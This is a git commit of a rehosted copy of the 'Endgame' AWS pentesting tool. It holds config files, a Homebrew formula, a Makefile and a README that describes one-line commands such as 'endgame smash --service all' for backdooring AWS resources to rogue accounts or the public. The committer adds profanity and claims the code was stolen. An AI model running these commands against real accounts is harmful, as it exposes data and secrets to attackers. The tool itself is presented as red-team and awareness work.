suck my dick and fucking like it

This commit is contained in:
volticamars 2021-03-16 02:14:28 +01:00
commit 5835c30090
181 changed files with 11376 additions and 0 deletions

72
.gitignore vendored Normal file
View File

@ -0,0 +1,72 @@
# IDEs
.idea
.vscode
# Mac OS X
.DS_Store
# Serverless framework
.serverless
.requirements.zip
node_modules/
# Working directories
tmp
!.gitkeep
# Python
.coverage
.Python
__pycache__/
*.py[cod]
*$py.class
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
venv/
*.egg-info/
.installed.cfg
*.egg
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
# HashiCorp
**/.terraform/*
*.plan
*.tfstate
*.tfstate.*
*.tfvars
terraform.tfvars
.vagrant
packer_cache/
*.box
#### Other
*.log
*.pem
#### Repository specific
.notes/*
**/private.tf
.python-version
ecr-policy.json

604
.pylintrc Normal file
View File

@ -0,0 +1,604 @@
[MASTER]
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-whitelist=
# Add files or directories to the blacklist. They should be base names, not
# paths.
ignore=CVS
# Add files or directories matching the regex patterns to the blacklist. The
# regex matches against base names, not paths.
ignore-patterns=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Specify a configuration file.
#rcfile=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED.
confidence=
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then reenable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=print-statement,
parameter-unpacking,
unpacking-in-except,
old-raise-syntax,
backtick,
long-suffix,
old-ne-operator,
old-octal-literal,
import-star-module-level,
non-ascii-bytes-literal,
raw-checker-failed,
bad-inline-option,
locally-disabled,
file-ignored,
suppressed-message,
useless-suppression,
deprecated-pragma,
use-symbolic-message-instead,
apply-builtin,
basestring-builtin,
buffer-builtin,
cmp-builtin,
coerce-builtin,
execfile-builtin,
file-builtin,
long-builtin,
raw_input-builtin,
reduce-builtin,
standarderror-builtin,
unicode-builtin,
xrange-builtin,
coerce-method,
delslice-method,
getslice-method,
setslice-method,
no-absolute-import,
old-division,
dict-iter-method,
dict-view-method,
next-method-called,
metaclass-assignment,
indexing-exception,
raising-string,
reload-builtin,
oct-method,
hex-method,
nonzero-method,
cmp-method,
input-builtin,
round-builtin,
intern-builtin,
unichr-builtin,
map-builtin-not-iterating,
zip-builtin-not-iterating,
range-builtin-not-iterating,
filter-builtin-not-iterating,
using-cmp-argument,
eq-without-hash,
div-method,
idiv-method,
rdiv-method,
exception-message-attribute,
invalid-str-codec,
sys-max-int,
bad-python3-import,
deprecated-string-function,
deprecated-str-translate-call,
deprecated-itertools-function,
deprecated-types-field,
next-method-defined,
dict-items-not-iterating,
dict-keys-not-iterating,
dict-values-not-iterating,
deprecated-operator-function,
deprecated-urllib-function,
xreadlines-attribute,
deprecated-sys-function,
exception-escape,
comprehension-escape,
fixme,
line-too-long,
duplicate-code,
consider-using-sys-exit,
no-else-return,
too-few-public-methods,
too-many-nested-blocks,
too-many-statements,
too-many-branches,
self-assigning-variable,
pointless-string-statement,
too-many-locals,
consider-using-enumerate,
too-many-arguments,
expression-not-assigned,
invalid-name,
logging-too-many-args,
bad-continuation,
logging-format-interpolation,
f-string-without-interpolation,
logging-fstring-interpolation,
unused-variable,
no-self-use
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
enable=c-extension-no-member
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'error', 'warning', 'refactor', and 'convention'
# which contain the number of messages in each category, as well as 'statement'
# which is the total number of statements analyzed. This score is used by the
# global evaluation report (RP0004).
evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
#msg-template=
# Set the output format. Available formats are text, parseable, colorized, json
# and msvs (visual studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
output-format=text
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit
[LOGGING]
# Format style used to check logging format string. `old` means using %
# formatting, `new` is for `{}` formatting,and `fstr` is for f-strings.
logging-format-style=old
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. Available dictionaries: none. To make it work,
# install the python-enchant package.
spelling-dict=
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether missing members accessed in mixin class should be ignored. A
# mixin class is detected if its name ends with "mixin" (case insensitive).
ignore-mixin-members=yes
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local
# List of module names for which member attributes should not be checked
# (useful for modules/projects where namespaces are manipulated during runtime
# and thus existing member attributes cannot be deduced by static analysis). It
# supports qualified module names, as well as Unix pattern matching.
ignored-modules=
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored. Default to name
# with leading underscore.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=119
# Maximum number of lines in a module.
max-module-lines=1000
# List of optional constructs for which whitespace checking is disabled. `dict-
# separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}.
# `trailing-comma` allows a space between comma and closing bracket: (a, ).
# `empty-line` allows space-only lines.
no-space-check=trailing-comma,
dict-separator
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[SIMILARITIES]
# Ignore comments when computing similarities.
ignore-comments=yes
# Ignore docstrings when computing similarities.
ignore-docstrings=yes
# Ignore imports when computing similarities.
ignore-imports=no
# Minimum lines number of a similarity.
min-similarity-lines=4
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style.
#class-attribute-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style.
#variable-rgx=
[STRING]
# This flag controls whether the implicit-str-concat-in-sequence should
# generate a warning on implicit string concatenation in sequences defined over
# several lines.
check-str-concat-over-line-jumps=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=optparse,tkinter.tix
# Create a graph of external dependencies in the given file (report RP0402 must
# not be disabled).
ext-import-graph=
# Create a graph of every (i.e. internal and external) dependencies in the
# given file (report RP0402 must not be disabled).
import-graph=
# Create a graph of internal dependencies in the given file (report RP0402 must
# not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[CLASSES]
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,
_fields,
_replace,
_source,
_make
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=cls
[DESIGN]
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when being caught. Defaults to
# "BaseException, Exception".
overgeneral-exceptions=BaseException,
Exception

18
.readthedocs.yml Normal file
View File

@ -0,0 +1,18 @@
# Read the Docs configuration file
# See https://docs.readthedocs.io/en/stable/config-file/v2.html for details
# Required
version: 2
mkdocs:
configuration: mkdocs.yml
fail_on_warning: false
# Optionally build your docs in additional formats such as PDF and ePub
formats: all
# Optionally set the version of Python and requirements required to build your docs
python:
version: 3.7
install:
- requirements: docs/requirements-docs.txt

105
CODE_OF_CONDUCT.md Normal file
View File

@ -0,0 +1,105 @@
# Salesforce Open Source Community Code of Conduct
## About the Code of Conduct
Equality is a core value at Salesforce. We believe a diverse and inclusive
community fosters innovation and creativity, and are committed to building a
culture where everyone feels included.
Salesforce open-source projects are committed to providing a friendly, safe, and
welcoming environment for all, regardless of gender identity and expression,
sexual orientation, disability, physical appearance, body size, ethnicity, nationality,
race, age, religion, level of experience, education, socioeconomic status, or
other similar personal characteristics.
The goal of this code of conduct is to specify a baseline standard of behavior so
that people with different social values and communication styles can work
together effectively, productively, and respectfully in our open source community.
It also establishes a mechanism for reporting issues and resolving conflicts.
All questions and reports of abusive, harassing, or otherwise unacceptable behavior
in a Salesforce open-source project may be reported by contacting the Salesforce
Open Source Conduct Committee at ossconduct@salesforce.com.
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of gender
identity and expression, sexual orientation, disability, physical appearance,
body size, ethnicity, nationality, race, age, religion, level of experience, education,
socioeconomic status, or other similar personal characteristics.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy toward other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Personal attacks, insulting/derogatory comments, or trolling
* Public or private harassment
* Publishing, or threatening to publish, others' private information—such as
a physical or electronic address—without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
* Advocating for or encouraging any of the above behaviors
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned with this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project email
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the Salesforce Open Source Conduct Committee
at ossconduct@salesforce.com. All complaints will be reviewed and investigated
and will result in a response that is deemed necessary and appropriate to the
circumstances. The committee is obligated to maintain confidentiality with
regard to the reporter of an incident. Further details of specific enforcement
policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership and the Salesforce Open Source Conduct
Committee.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][contributor-covenant-home],
version 1.4, available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html.
It includes adaptions and additions from [Go Community Code of Conduct][golang-coc],
[CNCF Code of Conduct][cncf-coc], and [Microsoft Open Source Code of Conduct][microsoft-coc].
This Code of Conduct is licensed under the [Creative Commons Attribution 3.0 License][cc-by-3-us].
[contributor-covenant-home]: https://www.contributor-covenant.org (https://www.contributor-covenant.org/)
[golang-coc]: https://golang.org/conduct
[cncf-coc]: https://github.com/cncf/foundation/blob/master/code-of-conduct.md
[microsoft-coc]: https://opensource.microsoft.com/codeofconduct/
[cc-by-3-us]: https://creativecommons.org/licenses/by/3.0/us/

114
HomebrewFormula/endgame.rb Normal file
View File

@ -0,0 +1,114 @@
class Endgame < Formula
include Language::Python::Virtualenv
desc "Shiny new formula"
homepage "https://git.tcp.direct/volticamars/aws-endgame"
url "https://files.pythonhosted.org/packages/0c/f0/9eced7d6c57483c49db1a5bdbb4061e5f8346a3701bef9354e98b7f3f84e/endgame-0.2.0.tar.gz"
sha256 "6d2833293f51cc899f9a01c84e170ad44e087e5f3ebc8b909f4ca1ffbeef7766"
depends_on "python3"
resource "beautifulsoup4" do
url "https://files.pythonhosted.org/packages/6b/c3/d31704ae558dcca862e4ee8e8388f357af6c9d9acb0cad4ba0fbbd350d9a/beautifulsoup4-4.9.3.tar.gz"
sha256 "84729e322ad1d5b4d25f805bfa05b902dd96450f43842c4e99067d5e1369eb25"
end
resource "boto3" do
url "https://files.pythonhosted.org/packages/79/94/8cdeff002e0c9ab56f88560523036d8efcb7680e02abe2fa4fc8f4bd87c2/boto3-1.17.8.tar.gz"
sha256 "819890e92268d730bdef1d8bac08fb069b148bec21f2172a1a99380798224e1b"
end
resource "botocore" do
url "https://files.pythonhosted.org/packages/62/84/f5415b10f5447fa3323ebf2480fe36985f65da24e2def14fc9a4939a737f/botocore-1.20.8.tar.gz"
sha256 "cd621cdd14a81d2c3c5276516066d9e6ea20a515cf3113a80ad74f3f8b04a093"
end
resource "certifi" do
url "https://files.pythonhosted.org/packages/06/a9/cd1fd8ee13f73a4d4f491ee219deeeae20afefa914dfb4c130cfc9dc397a/certifi-2020.12.5.tar.gz"
sha256 "1a4995114262bffbc2413b159f2a1a480c969de6e6eb13ee966d470af86af59c"
end
resource "chardet" do
url "https://files.pythonhosted.org/packages/ee/2d/9cdc2b527e127b4c9db64b86647d567985940ac3698eeabc7ffaccb4ea61/chardet-4.0.0.tar.gz"
sha256 "0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa"
end
resource "click" do
url "https://files.pythonhosted.org/packages/27/6f/be940c8b1f1d69daceeb0032fee6c34d7bd70e3e649ccac0951500b4720e/click-7.1.2.tar.gz"
sha256 "d2b5255c7c6349bc1bd1e59e08cd12acbbd63ce649f2588755783aa94dfb6b1a"
end
resource "colorama" do
url "https://files.pythonhosted.org/packages/1f/bb/5d3246097ab77fa083a61bd8d3d527b7ae063c7d8e8671b1cf8c4ec10cbe/colorama-0.4.4.tar.gz"
sha256 "5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"
end
resource "contextlib2" do
url "https://files.pythonhosted.org/packages/02/54/669207eb72e3d8ae8b38aa1f0703ee87a0e9f88f30d3c0a47bebdb6de242/contextlib2-0.6.0.post1.tar.gz"
sha256 "01f490098c18b19d2bd5bb5dc445b2054d2fa97f09a4280ba2c5f3c394c8162e"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/ea/b7/e0e3c1c467636186c39925827be42f16fee389dc404ac29e930e9136be70/idna-2.10.tar.gz"
sha256 "b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6"
end
resource "jmespath" do
url "https://files.pythonhosted.org/packages/3c/56/3f325b1eef9791759784aa5046a8f6a1aff8f7c898a2e34506771d3b99d8/jmespath-0.10.0.tar.gz"
sha256 "b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9"
end
resource "policy-sentry" do
url "https://files.pythonhosted.org/packages/5a/d6/09bd6125cc20eac023ad5b5a8391de709e40d6787b14775e6dbc8c32e96e/policy_sentry-0.11.5.tar.gz"
sha256 "c0ef418e6bd062d21185a51f40ad39b997d7ae5da793d2a8c0ea013c2f15da5c"
end
resource "python-dateutil" do
url "https://files.pythonhosted.org/packages/be/ed/5bbc91f03fa4c839c4c7360375da77f9659af5f7086b7a7bdda65771c8e0/python-dateutil-2.8.1.tar.gz"
sha256 "73ebfe9dbf22e832286dafa60473e4cd239f8592f699aa5adaf10050e6e1823c"
end
resource "PyYAML" do
url "https://files.pythonhosted.org/packages/a0/a4/d63f2d7597e1a4b55aa3b4d6c5b029991d3b824b5bd331af8d4ab1ed687d/PyYAML-5.4.1.tar.gz"
sha256 "607774cbba28732bfa802b54baa7484215f530991055bb562efbed5b2f20a45e"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/6b/47/c14abc08432ab22dc18b9892252efaf005ab44066de871e72a38d6af464b/requests-2.25.1.tar.gz"
sha256 "27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804"
end
resource "s3transfer" do
url "https://files.pythonhosted.org/packages/08/e1/3ee2096ebaeeb8c186d20ed16c8faf4a503913e5c9a0e14cd6b8ffc405a3/s3transfer-0.3.4.tar.gz"
sha256 "7fdddb4f22275cf1d32129e21f056337fd2a80b6ccef1664528145b72c49e6d2"
end
resource "schema" do
url "https://files.pythonhosted.org/packages/2b/91/42bc143289fd5f032ab1b01c5da32dc162ae808a585122f27ed5bf67268f/schema-0.7.4.tar.gz"
sha256 "fbb6a52eb2d9facf292f233adcc6008cffd94343c63ccac9a1cb1f3e6de1db17"
end
resource "six" do
url "https://files.pythonhosted.org/packages/6b/34/415834bfdafca3c5f451532e8a8d9ba89a21c9743a0c59fbd0205c7f9426/six-1.15.0.tar.gz"
sha256 "30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259"
end
resource "soupsieve" do
url "https://files.pythonhosted.org/packages/54/b9/1584ee0cd971ea935447c87bbc9d195d981feec446dd0af799d9d95c9d86/soupsieve-2.2.tar.gz"
sha256 "407fa1e8eb3458d1b5614df51d9651a1180ea5fedf07feb46e45d7e25e6d6cdd"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/d7/8d/7ee68c6b48e1ec8d41198f694ecdc15f7596356f2ff8e6b1420300cf5db3/urllib3-1.26.3.tar.gz"
sha256 "de3eedaad74a2683334e282005cd8d7f22f4d55fa690a2a1020a416cb0a47e73"
end
def install
virtualenv_create(libexec, "python3")
virtualenv_install_with_resources
end
test do
false
end
end

11
LICENSE Normal file
View File

@ -0,0 +1,11 @@
Copyright 2021 Salesforce.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.

91
Makefile Normal file
View File

@ -0,0 +1,91 @@
SHELL:=/bin/bash
.PHONY: setup-env
setup-env:
python3 -m venv ./venv && source venv/bin/activate
python3 -m pip install -r requirements.txt
.PHONY: setup-dev
setup-dev: setup-env
python3 -m pip install -r requirements-dev.txt
.PHONY: build-docs
build-docs: setup-dev
mkdocs build
.PHONY: serve-docs
serve-docs: setup-dev
mkdocs serve --dev-addr "127.0.0.1:8001"
.PHONY: build
build: setup-env clean
python3 -m pip install --upgrade setuptools wheel
python3 -m setup -q sdist bdist_wheel
.PHONY: install
install: build
python3 -m pip install -q ./dist/endgame*.tar.gz
endgame --help
.PHONY: uninstall
uninstall:
python3 -m pip uninstall endgame -y
python3 -m pip uninstall -r requirements.txt -y
python3 -m pip uninstall -r requirements-dev.txt -y
python3 -m pip freeze | xargs python3 -m pip uninstall -y
.PHONY: clean
clean:
rm -rf dist/
rm -rf build/
rm -rf *.egg-info
find . -name '*.pyc' -delete
find . -name '*.pyo' -delete
find . -name '*.egg-link' -delete
find . -name '*.pyc' -exec rm --force {} +
find . -name '*.pyo' -exec rm --force {} +
.PHONY: test
test: setup-dev
python3 -m coverage run -m pytest -v
.PHONY: security-test
security-test: setup-dev
bandit -r ./endgame/
.PHONY: fmt
fmt: setup-dev
black endgame/
.PHONY: lint
lint: setup-dev
pylint endgame/
.PHONY: publish
publish: build
python3 -m pip install --upgrade twine
python3 -m twine upload dist/*
python3 -m pip install endgame
.PHONY: count-loc
count-loc:
echo "If you don't have tokei installed, you can install it with 'brew install tokei'"
echo "Website: https://github.com/XAMPPRocky/tokei#installation'"
tokei ./* --exclude --exclude '**/*.html' --exclude '**/*.json'
.PHONY: terraform-demo
terraform-demo:
cd terraform && terraform init && terraform apply --auto-approve
.PHONY: terraform-destroy
terraform-destroy:
cd terraform && terraform destroy --auto-approve
.PHONY: integration-test
integration-test: setup-dev
python3 -m invoke test.list-resources
python3 -m invoke test.expose-dry-run
python3 -m invoke test.expose
python3 -m invoke test.expose-undo
make terraform-destroy

438
README.md Normal file
View File

@ -0,0 +1,438 @@
# I HAVE STOLE THIS CODE BEFORE FUCKING SALESFORCE OR FUCKING GIT TOOK IT DOWN, COOL TOOL I SWEAR!!!! MUST USE!!!
# ALL CREDITS GO TO THIS FUCK FROM SALESFORCE )
# BUT FOR WHATEVER THE FUCK REASON U CAN STILL INSTALL IT USING PIMP OR HoMeBr3333Wwww.com
# Endgame
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈
[![Twitter](https://img.shields.io/twitter/url/https/twitter.com/kmcquade3.svg?style=social&label=Follow%20the%20author)](https://twitter.com/kmcquade3)
[![Documentation Status](https://readthedocs.org/projects/endgame/badge/?version=latest)](https://endgame.readthedocs.io/en/latest/?badge=latest)
[![Downloads](https://pepy.tech/badge/endgame)](https://pepy.tech/project/endgame)
<p align="center">
<img src="docs/images/endgame.gif">
</p>
**TL;DR**: `endgame smash --service all` to create backdoors across your entire AWS account - by sharing resources either with a rogue IAM user/role or with the entire Internet.
# Endgame: Creating Backdoors in AWS
Endgame abuses AWS's resource permission model to grant rogue users (or the Internet) access to an AWS account's resources with a single command. It does this through one of three methods:
1. Modifying [resource-based policies](https://endgame.readthedocs.io/en/latest/resource-policy-primer/) (such as [S3 Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteAccessPermissionsReqd.html#bucket-policy-static-site) or [Lambda Function policies](https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html#permissions-resource-xaccountinvoke))
2. Resources that can be made public through sharing APIs (such as [Amazon Machine Images (AMIs)](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html), [EBS disk snapshots](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html), and [RDS database snapshots](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html))
3. Sharing resources via [AWS Resource Access Manager (RAM)](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html)
Endgame was created to:
* Push [AWS](https://endgame.readthedocs.io/en/latest/recommendations-to-aws/) to improve coverage of AWS Access Analyzer so AWS users can protect themselves.
* Show [blue teams](#recommendations-to-blue-teams) and developers what kind of damage can be done by overprivileged/leaked accounts.
* Help red teams to demonstrate impact of their access.
Endgame demonstrates (with a bit of shock and awe) how simple human errors in excessive permissions (such a granting `s3:*` access instead of `s3:GetObject`) can be abused by attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves. This is what inspired us to write this tool. Follow the [Tutorial](#tutorial) and observe how you can expose resources across **17 different AWS services** to the Internet in a matter of seconds.
The resource types that can be exposed are of high value to attackers. This can include:
* Privileged compute access (by exposing who can invoke `lambda` functions)
* Database snapshots (`rds`), Storage buckets (`s3`), file systems (`elasticfilesystem`), storage backups (`glacier`), disk snapshots (`ebs` snapshots),
* Encryption keys (`kms`), secrets (`secretsmanager`), and private certificate authorities (`acm-pca`)
* Messaging and notification services (`sqs` queues, `sns` topics, `ses` authorized senders)
* Compute artifacts (`ec2` AMIs, `ecr` images, `lambda` layers)
* Logging endpoints (`cloudwatch` resource policies)
* Search and analytics engines (`elasticsearch` clusters)
